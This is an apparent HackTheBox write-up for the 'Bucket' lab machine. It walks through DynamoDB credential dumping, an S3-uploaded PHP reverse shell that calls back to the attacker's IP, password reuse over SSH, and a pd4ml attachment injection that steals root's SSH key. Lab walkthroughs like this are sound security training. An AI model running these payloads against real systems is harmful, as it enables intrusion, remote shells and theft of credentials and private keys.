HTB Bucket
Writeup for Bucket box on HackTheBox.eu
Initial enumeration
Port 80 is open so we navigate to that in a browser. Here we discovere it's trying to load images from s3.bucket.htb so we add the s3.bucket.htb and bucket.htb to our hosts file
Using fuff doesn't show anything interesting except a shell folder
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://s3.bucket.htb/FUZZ -o ffuf_10.10.10.212.json -e .html,.php,.txt -c --fl 10
http://s3.bucket.htb/shell/
AWS DynamoDB
var params = {
ExclusiveStartTableName: 'table_name', // optional (for pagination, returned as LastEvaluatedTableName)
Limit: 10, // optional (to further limit the number of table names returned per page)
};
dynamodb.listTables(params, function(err, data) {
if (err) ppJson(err); // an error occurred
else ppJson(data); // successful response
});
This show one table users
var params = {
TableName: 'users',
};
dynamodb.scan(params, function(err, data) {
if (err) ppJson(err); // an error occurred
else ppJson(data); // successful response
});
This shows us the following data:
{
"Items": [{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}, {
"password": {
"S": "Welcome123!"
},
"username": {
"S": "Cloudadm"
}
}, {
"password": {
"S": "n2vM-<_K_Q:.Aa2"
},
"username": {
"S": "Sysadm"
}
}],
"Count": 3,
"ScannedCount": 3
}
We test the credentials above with both SSH and AWS s3. We get a hit on the AWS S3 so let's run some enumeration on this
AWS S3 Enumeration
List content of S3 bucket
aws --endpoint-url http://s3.bucket.htb/ s3 ls
aws --endpoint-url http://s3.bucket.htb/ s3 ls s3://adserver/
Write the following content to sh.php
<?php
$sock=fsockopen("10.10.x.x",8443);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
Upload the file to the s3 bucket
aws --endpoint-url http://s3.bucket.htb/ s3 cp sh.php s3://adserver/sh.php
Setup Listener
ncat -nvlp 8443
Trigger the shell - you might have to try multiple times
curl http://bucket.htb/sh.php
This will give us a shell as the www-data user.
From etc/passwd we see there is another user roy and root which have access to the server.
There seems to be a server listening on loopback port 8000, this looks interesting.
Using Ligolo we create a tunnel for us to view port 8000
Kali Box:
Bucket Box:
Using the password n2vM-<_K_Q:.Aa2
we try to ssh into the server as roy.
This works and we have our first flag.
Privilege escalation
Now we have read access to /var/www/bucket-app
In here we find a pd4ml_demo.jar but also looking at index.php we notice it does something strange
By the looks of the script if we can write to the alerts table an entry with the title Ransomware and data as html it will generate a pdf out of it.
Proxy the traffic to port 4566 again using ligolo so we can easily add the necessary data to DynamoDB
Create the alerts table:
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5
Test the table
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 scan --table-name alerts
{
"Items": [],
"Count": 0,
"ScannedCount": 0,
"ConsumedCapacity": null
}
Doing some research into pd4ml it looks like it has a custom html attribute for attachments. Let's give it a go
<pd4ml:attachment src="file:///etc/passwd"><pd4ml:attachment>
After a few failed attempts of generating invalid PDFs I ended up with the follwing bash script (scripted because the server cleans itself often and the files/tables dissapear)
#!/bin/bash
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<html><pd4ml:attachment description=\"attached.txt\" type=\"paperclip\" src=\"file:///root/.ssh/id_rsa\"></pd4ml:attachment></html>"}}'
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 scan --table-name alerts
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000
The above script will create a new DynamoDB table, insert our payload to grab the root id_rsa and force the script to generate the pdf. Once the exploit runs access the pdf via http://127.0.0.1:8000/files/result.pdf and download the attached file, change the permissions to be 600 and ssh in as root.